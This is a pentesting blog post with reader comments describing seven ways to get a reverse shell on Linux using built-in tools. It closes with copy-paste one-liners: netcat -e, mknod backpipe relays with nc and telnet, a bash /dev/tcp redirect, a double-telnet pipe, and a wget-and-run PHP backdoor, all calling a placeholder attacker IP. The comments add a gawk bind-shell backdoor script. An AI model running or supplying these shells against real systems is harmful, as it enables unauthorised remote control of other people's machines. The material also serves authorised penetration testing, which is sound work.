There are many distributions of linux, and they all do things a little different regarding default security and built-in tool sets. Which means when engaging these different flavors during a pentest, what works against one linux target to get an interactive shell, may not work against another. Well, not to worry my friends, there are many techniques for spawning shells, specifically reverse shells, from linux, and one or more of these techniques is bound to be available no matter which distro you’re looking at.
The scenario is this: You have the ability to run a simple command, or cause a user to run a simple command, on the target system. Whether it be via a Remote Command Execution vulnerability in a website, or some sort of php injected XSS which causes a privileged user to run commands on the target system. There are many instances of this scenario. Starting from the easiest and most common, here are some of the techniques which can be used to gain reverse shell on the target system.
#1. netcat:
Surprise!!! Nothing new here. Plain and simple. Fire up a listener on the attacker machine on a port which is reachable from the target and connect back to the listener with netcat. Looks like this.
…just kidding…
#2. netcat with GAPING_SECURITY_HOLE disabled:
This is a little trick that Ed Skoudis tweeted about in November of last year, but I haven’t seen it widely publicized. It is based on the common technique used to build netcat relays. When the GAPING_SECURITY_HOLE is disabled, which means you don’t have access to the ‘-e’ option of netcat, most people pass on using netcat and move to something else. Well this just isn’t necessary. Create a FIFO file system object and use it as a backpipe to relay standard output from commands piped from netcat to /bin/bash back into netcat. Sounds confusing right? The following image should clear things up.
#3. netcat without netcat:
I love “hacks” that use features of the operating system against itself. This is one of those “hacks”. It takes the /dev/tcp socket programming feature and uses it to redirect /bin/bash to a remote system. It’s not always available, but can be quite handy when it is.
#4. netcat without netcat or /dev/tcp:
/dev/tcp not available either? Just use telnet with technique #2.
#5. telnet-to-telnet:
I’m not sure why you’d use this technique, but it’s an option, so here it is nonetheless. This is clearly the ugliest of the techniques. This technique uses two telnet sessions connected to remote listeners to pipe input from one telnet session to /bin/bash, and pipe the output to the second telnet session. Commands are entered into one the of the attackers listeners and feedback is received on the other.
#6. RCE shell:
On this one I’m cheating a little bit. This applies to Remote Command Execution vulnerabilities only. Rather than manually enter commands into a proxy or browser url, I wrote small python script which gives you the feel of a shell, without spawning anything in reverse from the target. You merely pass the script the vulnerable url with the injectable field replaced with the ‘<rce>’ tag and it presents you with a clean interface for entering commands. In the background, the script is making the request to the web server, parsing the response, and presenting it to you.
#7. PHP reverse shell via interactive console:
The last technique makes use of the php interactive console. The attacker issues one command which moves to the /tmp directory (because it is typically world writable), uses wget to download a malicious php reverse_tcp backdoor (which the attacker hosts on a web server that he controls), and executes the backdoor via the interactive console.
I want to end this post by stating that I am not the originator of techniques #1, 2, 3, 5, or 7. The majority of these techniques were learned in Ed Skoudis’ amazing Security 504 and 560 classes available through SANS. Technique #4 is something I’ve never seen but stumbled across as I was conducting the demos for this post, so I’ll take credit. Obviously, anyone can do #6, and there are plugins for various automated web app testing software packages that do, but I built my script from the ground up and tailored it to preference. If you know of any additional methods that may be helpful to the pentesting community, please leave in the comments below. Without sharing, we all fail. Thanks, and enjoy!
For copy and paste love…
1. nc <attacker_ip> <port> -e /bin/bash
2. mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
3. /bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
4. mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
5. telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>
6. NA
7. wget -O /tmp/bd.php <url_to_malicious_file> && php -f /tmp/bd.php
I use weevely as PHP shell and is quite good, like a rce with some option to bypass php safe mode. try it.
You forgot the Reverse PHP Shell from PenTestMonkey.net (Direct: http://pentestmonkey.net/tools/php-reverse-shell/ )
It’s reliable and quite good, I prefer it over netcat actually :-)
[...] nice article from lanmaster53.com about alternative ways of remote access using reverse connection: There are many distributions of [...]
[...] Source: http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/ This was written by admin. Posted on Saturday, May 28, 2011, at 9:47 pm. Filed under Penetration [...]
little do the script kiddies know, there is more to shells than php-shell-name-goes-here.php, netcat, and the shellcodes in exploits you dont understand…
knull, not sure where this is relevant, but ok. thx.
not to forget the grugq’s awk shell:
#!/usr/bin/gawk -f
BEGIN {
Port = 8080
Prompt = “bkd> ”
Service = “/inet/tcp/” Port “/0/0″
while (1) {
do {
printf Prompt |& Service
Service |& getline cmd
if (cmd) {
while ((cmd |& getline) > 0)
print $0 |& Service
close(cmd)
}
} while (cmd != “exit”)
close(Service)
}
}
cheers,
T0X1C
Could you do a netcat to netcat to netcat (Inception netcat) to avoid detection? Like bouncing trougth 5 or 6 ports on the target machine internally that connect to themselves?
I know, stupid question, it just came to me after seeing your telnet to telnet.
Itxaka, I don’t believe in stupid questions. We learn by asking.
What you are proposing would actually increase your chances of detection. Just think, if you were analyzing a system you suspected of having malware on it, what would having 5 or 6 instances of netcat running in the process list look like? Suspicious, right!? Your proposition would also make the attack easier to mitigate. If one of the links in the chain was killed, the entire system would die. Lastly, in order to fire-up netcat listeners and chain them, you must be able to bind to ports. The user context in which you are launching these commands may not have permissions to do so.
You did get me thinking about something else though… Possible blog post on this topic to follow.
Fascinating post, the reverse telnet and double telnet tricks were new to me. Have added them to my list of evil tricks :D
The gawk trick I see in the comments is also new. VERY interesting stuff that I will have to play with!
Any chance of posting the python script you wrote? want to see how it works – esp your handling of the tags as I find they break some of my own stuff from time to time for arbritary reasons.